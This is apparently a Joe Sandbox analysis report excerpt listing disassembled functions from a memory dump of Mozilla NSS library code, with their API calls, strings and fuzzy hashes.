Opcode Fuzzy Hash: 33b6ca91a71f7bcf97d6629c2e4cf137d91b5499985970e80cb10081e0e71b6b
Instruction Fuzzy Hash: 159160B5900601DFDB14DF25C880946BBF5FF4931872985A9D8195BB22EB32FD46CB90

Function 6CF15CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6CF12BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CF12A28,00000060,00000001), ref: 6CF12BF0
Part of subcall function 6CF12BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CF12A28,00000060,00000001), ref: 6CF12C07
Part of subcall function 6CF12BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CF12A28,00000060,00000001), ref: 6CF12C1E
Part of subcall function 6CF12BE0: free.MOZGLUE(?,00000000,00000000,?,6CF12A28,00000060,00000001), ref: 6CF12C4A

free.MOZGLUE(?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15D0F
free.MOZGLUE(?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15D4E
free.MOZGLUE(?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15D62
free.MOZGLUE(?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15D85
free.MOZGLUE(?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15D99
free.MOZGLUE(?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CF15E3E
free.MOZGLUE(?,?,?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CF15E47
free.MOZGLUE(?,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CF1AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CF15E78
free.MOZGLUE(?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF15EB9
free.MOZGLUE(?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF15EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF15F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF15F4B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 7fa33b9d56b8726020a0e72f505d00c7f85dc303d1f62c01a65bf83b23abb90e
Instruction ID: f70a52df957ddc80239cea9c32eaf4be64cdae1f047a0395791fd5861cbdc279
Opcode Fuzzy Hash: 7fa33b9d56b8726020a0e72f505d00c7f85dc303d1f62c01a65bf83b23abb90e
Instruction Fuzzy Hash: C5717CB9E04B019FD700DF24D884A92B7F5BF89308F148569E85E87B11EB31F955CB91

Function 6CE98DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CE98E22
EnterCriticalSection.KERNEL32(?), ref: 6CE98E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CE98E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CE98E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE98E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CE98EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CE98EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE98EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CE98F00
free.MOZGLUE(?), ref: 6CE98F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CE98F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CE98F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CE98F5B
PR_Unlock.NSS3(?), ref: 6CE98F72
PR_Unlock.NSS3(?), ref: 6CE98F82

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: d8661efc7c88ac50b8aff055bafa59cc7b007d8490823db2bab26ab16469e728
Instruction ID: baafa859d2b76e269f54297f13c659c5d32eb6b42a62aab9d47e4c85eab375b6
Opcode Fuzzy Hash: d8661efc7c88ac50b8aff055bafa59cc7b007d8490823db2bab26ab16469e728
Instruction Fuzzy Hash: E65108B2E00215AFEB209F68CC8596EB7B9FF45358F25412AEC189B720E731ED4587D1

Function 6CEBCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CEBCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CEBCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CEBCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CEBCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CEBCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CEBCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CEBCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CEBCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CEBCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CEBCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CEBCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CEBCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CEBCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CEBD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CEBD021

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 9b38addcc5a4478e1ba4665d9a1a6f54ec052fd4a711fcf1a576a3bbcc354bf7
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 1031747571291127EF0E10565F21BEE206A8B7931EF55003CFD0AF97C0F695AB1702E5

Function 6CF90FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CF91000

Part of subcall function 6CF49BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE71A48), ref: 6CF49BB3
Part of subcall function 6CF49BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE71A48), ref: 6CF49BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CF91016

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_Unlock.NSS3(?), ref: 6CF91021

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF91046
PR_Unlock.NSS3(?), ref: 6CF9106B
PR_Lock.NSS3 ref: 6CF91079
PR_Unlock.NSS3 ref: 6CF91096
free.MOZGLUE(?), ref: 6CF910A7
free.MOZGLUE(?), ref: 6CF910B4
PR_DestroyCondVar.NSS3(?), ref: 6CF910BF
PR_DestroyCondVar.NSS3(?), ref: 6CF910CA
PR_DestroyCondVar.NSS3(?), ref: 6CF910D5
PR_DestroyCondVar.NSS3(?), ref: 6CF910E0
PR_DestroyLock.NSS3(?), ref: 6CF910EB
free.MOZGLUE(?), ref: 6CF91105

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 17d13a726b9e0bb4de00326944560b49b7819770bab98fc56034a4f6eda7944f
Instruction ID: 8de8bc7679250780993329c09373c9afcce98d5637bd20a3664f691e8ef6daae
Opcode Fuzzy Hash: 17d13a726b9e0bb4de00326944560b49b7819770bab98fc56034a4f6eda7944f
Instruction Fuzzy Hash: 2E316AB5A00801ABEB019F25ED41A85BB75BF05318B588134E80953F61EB32F978DBD2

Function 6CE0DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6CE0DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CE0DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CE0DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CE0DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0DECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE0DF6D, 6CE0DFCC, 6CE0DFDD
database corruption, xrefs: 6CE0DF77, 6CE0DFE7
%s at line %d of [%.10s], xrefs: 6CE0DF7C, 6CE0DFEC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 143ae0ab91d5e11f876062f218779e013b1bb8d86183cae2b9772ce41b6f3de5
Instruction ID: 4a3204f2cb3277fdf9ceccd5690b98989d96aa535a504a19e16eb732d954703e
Opcode Fuzzy Hash: 143ae0ab91d5e11f876062f218779e013b1bb8d86183cae2b9772ce41b6f3de5
Instruction Fuzzy Hash: 44A1E775B042019FD710CF29C481A6AB7F5EF85308F25892DF8898BB41D731EA66CBD2

Function 6CECEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CECEE0B

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CECEEE1

Part of subcall function 6CEC1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CEC1D7E
Part of subcall function 6CEC1D50: EnterCriticalSection.KERNEL32(?), ref: 6CEC1D8E
Part of subcall function 6CEC1D50: PR_Unlock.NSS3(?), ref: 6CEC1DD3

TlsGetValue.KERNEL32 ref: 6CECEE51
EnterCriticalSection.KERNEL32(?), ref: 6CECEE65
PR_Unlock.NSS3(?), ref: 6CECEEA2
free.MOZGLUE(?), ref: 6CECEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CECEED0
PR_Unlock.NSS3(?), ref: 6CECEF48
free.MOZGLUE(?), ref: 6CECEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CECEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CECEFA4
free.MOZGLUE(?), ref: 6CECEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CECF055
free.MOZGLUE(?), ref: 6CECF060

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 4aa684fc468de0a620bb63bc158ecbc72b8f62d6bc84d9218f1ed1c1a179ca38
Instruction ID: 9627b17514e22eaad24166f57b121db8c4864201c86a4f694935572fc06e80b8
Opcode Fuzzy Hash: 4aa684fc468de0a620bb63bc158ecbc72b8f62d6bc84d9218f1ed1c1a179ca38
Instruction Fuzzy Hash: C5817F71E00609AFDF009FA4DD46BDE7BB5BF09348F640028E919A7711E735E924CBA2

Function 6CE94CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CE94D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CE94D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CE94DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE94E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CE94E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CE94E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CE94E85
DER_Encode_Util.NSS3(?,?,6CFE05A4,00000000), ref: 6CE94EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CE94F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CE94F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE94F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE94F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE94F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE94FC8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 6e6e2c6952ea2862671d83cb3af528e8da80cf8e406637cbb358084a83ff30aa
Instruction ID: 1303cf848584e64163d4cfe47c6a4f842e94c83dd67ca5a33b59c65c37270530
Opcode Fuzzy Hash: 6e6e2c6952ea2862671d83cb3af528e8da80cf8e406637cbb358084a83ff30aa
Instruction Fuzzy Hash: 6281A171904302AFE701CF64D841B5AB7F4AB8934CF24892EF969DB741EB31E905CB92

Function 6CED5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CED5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CED5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CED5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CED5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CED5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CED5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CED5E18
TlsGetValue.KERNEL32 ref: 6CED5E5E
EnterCriticalSection.KERNEL32(?), ref: 6CED5E72
PR_Unlock.NSS3(?), ref: 6CED5E8B

Part of subcall function 6CECF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CECF854
Part of subcall function 6CECF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CECF868
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CECF882
Part of subcall function 6CECF820: free.MOZGLUE(04C483FF,?,?), ref: 6CECF889
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CECF8A4
Part of subcall function 6CECF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CECF8AB
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CECF8C9
Part of subcall function 6CECF820: free.MOZGLUE(280F10EC,?,?), ref: 6CECF8D0

Strings

d, xrefs: 6CED5C36
tokens=[0x%x=<%s>], xrefs: 6CED5D3D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: e1459d98c7acd07144b2e61a390a737e1fcd59606d6caf5ce753f01339cbfa47
Instruction ID: b090edb8a971c571358ad148c2eea2a5d0db823edd9b6a70960ef6beaa0fb541
Opcode Fuzzy Hash: e1459d98c7acd07144b2e61a390a737e1fcd59606d6caf5ce753f01339cbfa47
Instruction Fuzzy Hash: 3671E3F5E022029BEB00AF24EC41B6A3375EF4531CF350439DC099AB42EB36F956C692

Function 6CEC8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CEC9582), ref: 6CEC8F5B

Part of subcall function 6CEDBE30: SECOID_FindOID_Util.NSS3(6CE9311B,00000000,?,6CE9311B,?), ref: 6CEDBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CEC8F6A

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEC8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CEC8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CFAD820,6CEC9576), ref: 6CEC8FF9
DER_GetInteger_Util.NSS3(?), ref: 6CEC901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CEC903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEC9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CEC90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CEC90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CEC90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CEC912D
free.MOZGLUE(00000000), ref: 6CEC9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CEC9145

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 4960b13a8e9437c86e3ad6a8dfcbf20bfb881bcf0475586cff96484f22484b6c
Instruction ID: ffa23ddf3dd80153826857a83778c7b1d07f9a0daab1eae0f20428a3d23dda07
Opcode Fuzzy Hash: 4960b13a8e9437c86e3ad6a8dfcbf20bfb881bcf0475586cff96484f22484b6c
Instruction Fuzzy Hash: 8951C0B2A042409BEB10CF289D42B9AB7F4AF8435CF254529EC6497741EB35E945CB93

Function 6CE7AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CE7AF47

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

FreeLibrary.KERNEL32(?), ref: 6CE7AF6D
free.MOZGLUE(?), ref: 6CE7AFA4
free.MOZGLUE(?), ref: 6CE7AFAA
PR_ExitMonitor.NSS3 ref: 6CE7AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CE7AFF5
PR_ExitMonitor.NSS3 ref: 6CE7B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE7B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CE7B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE7B03C

Strings

%s decr => %d, xrefs: 6CE7AFF0
Unloaded library %s, xrefs: 6CE7B023

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 53f2ccccfeedcb9596a5b0d849e923b533451c12a6b055b01f2987446230b8c2
Instruction ID: 517137635b60ac597447417a514fc6da2968a4c7f31e0d494087c0cd97c44ee6
Opcode Fuzzy Hash: 53f2ccccfeedcb9596a5b0d849e923b533451c12a6b055b01f2987446230b8c2
Instruction Fuzzy Hash: 053125B5F44111ABEB609F65DC41B15B775EB0A30CB388125E80597B41F732E828CBF1

Function 6CEC6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CEC781D,00000000,6CEBBE2C,?,6CEC6B1D,?,?,?,?,00000000,00000000,6CEC781D), ref: 6CEC6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CEC781D,?,6CEBBE2C,?), ref: 6CEC6C58
